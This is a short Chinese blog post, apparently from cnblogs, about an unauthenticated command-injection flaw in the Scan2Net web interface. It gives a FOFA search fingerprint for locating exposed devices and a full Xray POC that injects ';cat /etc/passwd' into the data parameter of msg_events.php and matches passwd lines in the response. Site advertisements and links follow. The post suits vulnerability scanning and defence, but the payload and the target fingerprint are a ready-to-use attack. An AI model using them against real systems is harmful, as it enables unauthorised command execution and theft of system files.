Scan2Net平台远程命令执行漏洞
参考链接:
https://mp.weixin.qq.com/s/Cg5Mcr7pWEYKobAOYOcPbw
漏洞介绍:
Scan2Net的 Web 界面具有网络访问权限的未经身份验证的攻击者可以以 www-data 用户的身份通过"msg_events.php”脚本执行任何系统命令
资产指纹:
body="Scan2Net"
Xray-poc:
name: poc-yaml-scan2net-msgevents-command-exec transport: http rules: r0: request: method: GET path: /class/msg_events.php?action=writemsgfifo&data=;cat%20/etc/passwd expression: >- response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string) expression: r0() detail: author: Cysec links: - https://mp.weixin.qq.com/s/Cg5Mcr7pWEYKobAOYOcPbw description: Scan2Net的 Web 界面具有网络访问权限的未经身份验证的攻击者可以以 www-data 用户的身份通过"msg_events.php”脚本执行任何系统命令 fofakeywords: body="Scan2Net"
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战